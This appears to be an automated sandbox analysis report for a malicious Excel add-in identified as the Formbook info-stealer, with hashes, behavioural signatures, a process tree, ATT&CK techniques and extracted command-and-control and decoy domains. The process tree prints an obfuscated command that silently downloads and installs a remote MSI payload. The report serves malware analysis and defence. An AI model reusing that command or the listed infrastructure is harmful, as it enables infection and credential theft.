Overview

overview

10

Static

static

8

sp.xlam

windows7_x64

10

sp.xlam

windows10_x64

10

Analysis

  • max time kernel
    146s
  • max time network
    137s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    05-05-2021 13:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    sp.xlam

  • Size

    15KB

  • MD5

    399563af4221cc2c176d8f218d6a563d

  • SHA1

    72251218c8127abeab4c04944445c18bdac2688f

  • SHA256

    cc9cefa7960d991d414051f5fe153ffa514a2e687143dd2b1b6966edbbcadbec

  • SHA512

    bb0aef3126bc94f5bc32bddc96b4c6720b4eeeaa91c1a80c95039d4c88871fdc33ceef7cd579bd00d4acbc62987f9e6c0fa7efa08de81e4a4db8194f81f6ebea

Score
10/10
formbookratspywarestealertrojan

Malware Config

Extracted

Family

formbook

Version

4.1

C2

http://www.111bjs.com/ccr/

Decoy

abdullahlodhi.com

jevya.com

knoxvillerestaurant.com

mekarauroko7389.com

cricketspowder.net

johannchirinos.com

orangeorganical.com

libero-tt.com

lorenaegianluca.com

wintab.net

modernmillievintage.com

zgdqcyw.com

jeffabildgaardmd.com

nurulfikrimakassar.com

findyourchef.com

innovationsservicegroup.com

destek-taleplerimiz.com

whfqqco.icu

kosmetikmadeingermany.com

dieteticos.net

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

    trojanspywarestealerformbook
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Formbook Payload 2 IoCs
    rat
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Use of msiexec (install) with remote resource 1 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 6 IoCs
    installer
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 56 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of UnmapMainImage
    PID:3064
    • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\sp.xlam"
      2⤵
      • Checks processor information in registry
      • Enumerates system info in registry
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2256
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C m^SiE^x^e^c /i http://farm-finn.com//admin/56701.msi /qn
        3⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2576
        • C:\Windows\system32\msiexec.exe
          mSiExec /i http://farm-finn.com//admin/56701.msi /qn
          4⤵
          • Use of msiexec (install) with remote resource
          • Suspicious use of AdjustPrivilegeToken
          PID:3748
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2544
    • C:\Windows\Installer\MSI44B3.tmp
      "C:\Windows\Installer\MSI44B3.tmp"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:3680
      • C:\Windows\Installer\MSI44B3.tmp
        "C:\Windows\Installer\MSI44B3.tmp"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1572
        • C:\Windows\SysWOW64\msdt.exe
          "C:\Windows\SysWOW64\msdt.exe"
          4⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3196
          • C:\Windows\SysWOW64\cmd.exe
            /c del "C:\Windows\Installer\MSI44B3.tmp"
            5⤵
              PID:4040

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Credential Access

    Discovery

    Query Registry

    3
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    4
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
      MD5

      4fcb2a3ee025e4a10d21e1b154873fe2

      SHA1

      57658e2fa594b7d0b99d02e041d0f3418e58856b

      SHA256

      90bf6baa6f968a285f88620fbf91e1f5aa3e66e2bad50fd16f37913280ad8228

      SHA512

      4e85d48db8c0ee5c4dd4149ab01d33e4224456c3f3e3b0101544a5ca87a0d74b3ccd8c0509650008e2abed65efd1e140b1e65ae5215ab32de6f6a49c9d3ec3ff

      Download Submit
    • C:\Windows\Installer\MSI44B3.tmp
      MD5

      c143786765f282d07d418fe98d4fe91a

      SHA1

      d3bbaa15dfe972e30bac4687d4fb1a96185e0bc8

      SHA256

      c26dc231fde9a811c06eb82b7292892eb0db1ff3d45eeec55bc2a74944f39ac6

      SHA512

      14af7f19f4e01949121832585fad1e7fec752cf91083126bf7fddf4ccd5d85aac4ca7bcd7b377b4f1a0a814db5f15f2f7172b4290e0ea1c260950d128a3e13bf

      Download Submit
    • C:\Windows\Installer\MSI44B3.tmp
      MD5

      c143786765f282d07d418fe98d4fe91a

      SHA1

      d3bbaa15dfe972e30bac4687d4fb1a96185e0bc8

      SHA256

      c26dc231fde9a811c06eb82b7292892eb0db1ff3d45eeec55bc2a74944f39ac6

      SHA512

      14af7f19f4e01949121832585fad1e7fec752cf91083126bf7fddf4ccd5d85aac4ca7bcd7b377b4f1a0a814db5f15f2f7172b4290e0ea1c260950d128a3e13bf

      Download Submit
    • C:\Windows\Installer\MSI44B3.tmp
      MD5

      c143786765f282d07d418fe98d4fe91a

      SHA1

      d3bbaa15dfe972e30bac4687d4fb1a96185e0bc8

      SHA256

      c26dc231fde9a811c06eb82b7292892eb0db1ff3d45eeec55bc2a74944f39ac6

      SHA512

      14af7f19f4e01949121832585fad1e7fec752cf91083126bf7fddf4ccd5d85aac4ca7bcd7b377b4f1a0a814db5f15f2f7172b4290e0ea1c260950d128a3e13bf

      Download Submit
    • \Users\Admin\AppData\Local\Temp\nsf46C5.tmp\xdqurci0.dll
      MD5

      42b244a4f9d3af1a2788452e5507b0be

      SHA1

      4f59185e37d87cf7d4a0c43bc4f26b092c21e4bf

      SHA256

      14ade88d57789eb08d264b56ff0b46317452e50702285aff672ff12768e45c4f

      SHA512

      df0b5fc0fa680ff5ef849e3c9c312e07e4d741054dba3a9c9a7c05cfc2b99fba09776e864494a579cc34ba985c431d22de9917836cb38d1de05b9aea93fb55fa

      Download Submit
    • memory/1572-191-0x00000000009A0000-0x0000000000CC0000-memory.dmp
      Filesize

      3.1MB

      Download
    • memory/1572-188-0x00000000008D0000-0x00000000008E4000-memory.dmp
      Filesize

      80KB

      Download
    • memory/1572-192-0x0000000000920000-0x0000000000934000-memory.dmp
      Filesize

      80KB

      Download
    • memory/1572-190-0x0000000000400000-0x000000000042E000-memory.dmp
      Filesize

      184KB

      Download
    • memory/1572-185-0x000000000041EBB0-mapping.dmp
      Download
    • memory/2256-118-0x00007FFF9B3D0000-0x00007FFF9B3E0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2256-114-0x00007FF768EC0000-0x00007FF76C476000-memory.dmp
      Filesize

      53.7MB

      Download
    • memory/2256-123-0x0000020457C20000-0x0000020459B15000-memory.dmp
      Filesize

      31.0MB

      Download
    • memory/2256-122-0x00007FFFBBF90000-0x00007FFFBD07E000-memory.dmp
      Filesize

      16.9MB

      Download
    • memory/2256-119-0x00007FFF9B3D0000-0x00007FFF9B3E0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2256-117-0x00007FFF9B3D0000-0x00007FFF9B3E0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2256-116-0x00007FFF9B3D0000-0x00007FFF9B3E0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2256-115-0x00007FFF9B3D0000-0x00007FFF9B3E0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2576-179-0x0000000000000000-mapping.dmp
      Download
    • memory/3064-208-0x0000000000730000-0x0000000000740000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3064-213-0x0000000000730000-0x0000000000740000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3064-220-0x0000000000730000-0x0000000000740000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3064-193-0x0000000005F70000-0x000000000610C000-memory.dmp
      Filesize

      1.6MB

      Download
    • memory/3064-218-0x0000000000730000-0x0000000000740000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3064-219-0x0000000000730000-0x0000000000740000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3064-216-0x0000000000760000-0x0000000000770000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3064-217-0x0000000000730000-0x0000000000740000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3064-215-0x0000000000730000-0x0000000000740000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3064-214-0x0000000000730000-0x0000000000740000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3064-212-0x0000000000730000-0x0000000000740000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3064-201-0x00000000025D0000-0x0000000002687000-memory.dmp
      Filesize

      732KB

      Download
    • memory/3064-203-0x0000000000730000-0x0000000000740000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3064-204-0x0000000000730000-0x0000000000740000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3064-205-0x0000000000730000-0x0000000000740000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3064-206-0x0000000000730000-0x0000000000740000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3064-202-0x0000000000700000-0x0000000000710000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3064-189-0x0000000005E40000-0x0000000005F62000-memory.dmp
      Filesize

      1.1MB

      Download
    • memory/3064-209-0x0000000000760000-0x0000000000770000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3064-210-0x0000000000730000-0x0000000000740000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3064-211-0x0000000000730000-0x0000000000740000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3064-207-0x0000000000730000-0x0000000000740000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3196-200-0x00000000045E0000-0x0000000004673000-memory.dmp
      Filesize

      588KB

      Download
    • memory/3196-199-0x0000000004780000-0x0000000004AA0000-memory.dmp
      Filesize

      3.1MB

      Download
    • memory/3196-196-0x0000000000D30000-0x0000000000EA3000-memory.dmp
      Filesize

      1.4MB

      Download
    • memory/3196-197-0x0000000000670000-0x000000000069E000-memory.dmp
      Filesize

      184KB

      Download
    • memory/3196-195-0x0000000000000000-mapping.dmp
      Download
    • memory/3680-181-0x0000000000000000-mapping.dmp
      Download
    • memory/3680-187-0x0000000002FD0000-0x0000000002FF3000-memory.dmp
      Filesize

      140KB

      Download
    • memory/3748-180-0x0000000000000000-mapping.dmp
      Download
    • memory/4040-198-0x0000000000000000-mapping.dmp
      Download